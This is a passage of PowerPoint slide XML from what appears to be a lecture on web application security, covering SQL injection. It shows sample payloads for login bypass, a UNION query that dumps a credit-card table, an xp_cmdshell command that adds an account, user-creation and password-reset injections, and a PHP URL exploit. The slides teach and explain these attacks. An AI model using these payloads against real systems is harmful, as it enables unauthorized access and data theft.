          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> records match the query, so the result is not empty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="Symbol" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>correct “authentication”!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50181" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15D25798-6533-4D47-8E5A-EB390D9FE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275138"/>
            <a:ext cx="1295400" cy="296862"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20833"/>
              <a:gd name="adj2" fmla="val -103477"/>
            </a:avLst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Always true!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50182" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BDC3180-5B27-DE42-ADE2-23A97D0F7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275138"/>
            <a:ext cx="2590800" cy="296862"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -21199"/>
              <a:gd name="adj2" fmla="val -87435"/>
            </a:avLst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Everything after -- is ignored!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189498528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EE280359-DE58-DE41-958F-485743AA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BCF49416-99AF-2E47-BEAF-4C33DC2666DA}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>35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373D53B-10CB-8545-8769-6191D9C770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SQL Injection Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305603" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC6555CE-2A3C-FA46-B1E3-55EE4D322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524000"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>To authenticate logins, server runs this SQL command against the user database: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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        SELECT * WHERE user=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND pwd=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>User enters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ OR WHERE pwd LIKE ‘%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>as both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Server executes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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       SELECT * WHERE user=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ OR WHERE pwd LIKE ‘%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       AND pwd=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ OR WHERE pwd LIKE ‘%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Logs in with the credentials of the first person in the database (typically, administrator!)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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51205" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B283132-4148-8348-B344-9161F8D4C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6" y="1116014"/>
            <a:ext cx="345122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[From “The Art of Intrusion”]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305605" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53BC50B5-8401-194E-8F43-792521CF4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646488"/>
            <a:ext cx="3200400" cy="313932"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42065"/>
              <a:gd name="adj2" fmla="val 145611"/>
            </a:avLst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Wildcard matches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3336168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60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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EDE21B8-9ABA-4646-BFBB-40F06629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A31B998B-2C0D-E243-B54F-9E1B493ED49C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>36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EE1823A7-CBA1-804B-8ECE-907CBB625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 Gets Better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22C7E2FC-C53B-B744-820E-DA81C1809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82000" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>User gives username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>′ exec cmdshell  ‘net user badguy badpwd’ / ADD --</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Web server executes query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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set UserFound=execute(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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        SELECT * FROM UserTable WHERE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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        username= ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ exec … --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> … );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Creates an account for badguy on DB server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166030515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44884CF-7F1E-7447-94D7-389D7A30FF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Pull Data From Other Databases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5325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72B79B4-A1A6-964C-AF01-2D0FB902D2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User gives username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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND 1=0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION SELECT cardholder, number, exp_month, exp_year FROM creditcards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Results of two queries are combined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Empty table from the first query is displayed together with the entire contents of the credit card database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29CC39C4-DAB6-CF4B-A7D6-083026C5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89DF5044-A0AD-9540-B92B-693FBD21B27F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>37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363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699B1E6-9218-1648-9B8D-F49EE76EB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SQL Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5427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6032FB8-17FF-C94F-9A7C-668495504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Create new users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 	’; INSERT INTO USERS (‘uname’,‘passwd’,‘salt’)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   VALUES (‘hacker’,‘38a74f’, 3234);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Reset password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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’; UPDATE USERS SET email=hcker@root.org WHERE email=victim@yahoo.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54276" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{069BBFDD-5EBC-A147-96BC-DF23111D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D66FD6AE-6F0B-E946-9176-35C04D0BD42E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>38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897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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB20FA3B-4E2A-F64F-9502-CEA628B0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06F288F6-0515-E14E-BD47-CD55E12B3C95}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>39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93B0F4B-B3E4-164C-BB51-4415C18BE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Uninitialized Inputs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7F027B1-73EE-7642-9D33-29B8374B55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82000" cy="4876800"/>
          </a:xfrm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400"/>
              <a:t>/* php-files/lostpassword.php */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for ($i=0; $i&lt;=7; $i++)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     $new_pass .= chr(rand(97,122))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…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$result = dbquery(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t> ”.$db_prefix.“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    SET user_password=md5(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>$new_pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’)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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE user_id=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>”.$data[‘user_id’].“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/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In normal execution, this becomes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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPDATE users SET user_password=md5(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>????????</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’)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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE user_id=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276932" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50EAAD6C-B385-D544-B1C5-141B900BA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600201"/>
            <a:ext cx="2895600" cy="766763"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87718"/>
              <a:gd name="adj2" fmla="val 6242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Creates a password with 8 random characters, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>assuming $new_pass is set to NULL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276933" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E42FCFEF-17E1-4E49-B0C4-A2165B2D4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814889"/>
            <a:ext cx="1981200" cy="535531"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -91185"/>
              <a:gd name="adj2" fmla="val 7373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SQL query setting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password in the DB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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34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6932" grpId="0" animBg="1"/>
      <p:bldP spid="12769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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9ADA906-B619-EE42-9CE4-2A31821ED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Web Applications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D9F1B8B6-25AC-E14E-8BC9-715EB8D97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Big trend: software as a Web-based service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Applications hosted on Web servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Security is rarely the main concern</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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AE333F0E-D108-C340-A3CD-C50A3D49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slide </a:t>
            </a:r>
            <a:fld id="{9997AED8-4626-2042-998A-045AD60BD534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61396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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECE707B0-9245-1E43-8FEA-D4370BC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C5E4C0B9-9DF5-A64A-97B2-034E9F8065A5}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>40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6323" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADD040A0-F82F-EA41-872B-142D6B0A6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653089"/>
            <a:ext cx="2743200" cy="325437"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20370"/>
              <a:gd name="adj2" fmla="val -220731"/>
            </a:avLst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… with superuser privileges</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56324" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{281B74BF-6E60-3C4C-9E69-F8AA704A4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272089"/>
            <a:ext cx="1905000" cy="535531"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35333"/>
              <a:gd name="adj2" fmla="val -164593"/>
            </a:avLst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User’s password is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set to ‘badPwd’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56325" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF6842AC-7C23-9249-82CF-941971C93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Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56326" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38684887-E3AF-DC4A-9FEC-4D5FA9DA1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82000" cy="4876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/>
              <a:t>User appends this to the URL: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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;new_pass=badPwd%27%29%2c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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_level=%27103%27%2cuser_aim=%28%27</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>SQL query becomes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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPDATE users SET user_password=md5(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>badPwd’),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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>             user_level=‘103’, user_aim=(‘????????</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’)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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE user_id=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56327" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DB73836-5EC1-F243-8DC0-07A2D552A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187701"/>
            <a:ext cx="3886200" cy="535531"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20019"/>
              <a:gd name="adj2" fmla="val -9639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This sets $new_pass to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="160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badPwd’), user_level=‘103’, user_aim=(‘</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56328" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85D0FFC3-923E-DA4E-8C78-3A637A51F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116013"/>
            <a:ext cx="4821238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Only works against older versions of PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285723797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7CB919DD-0BBC-794F-8F78-76FF7CC36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Second-Order SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="573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388539B-6B1B-F746-BFED-0CAD203CA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178800" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Data stored in the database can be later used to conduct SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>For example, user manages to set uname to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin’ --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>This vulnerability could exist if input validation and escaping are applied inconsistently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Some Web applications only validate inputs coming from the Web server but not inputs coming from the back-end DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>UPDATE USERS SET passwd=‘cracked’ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
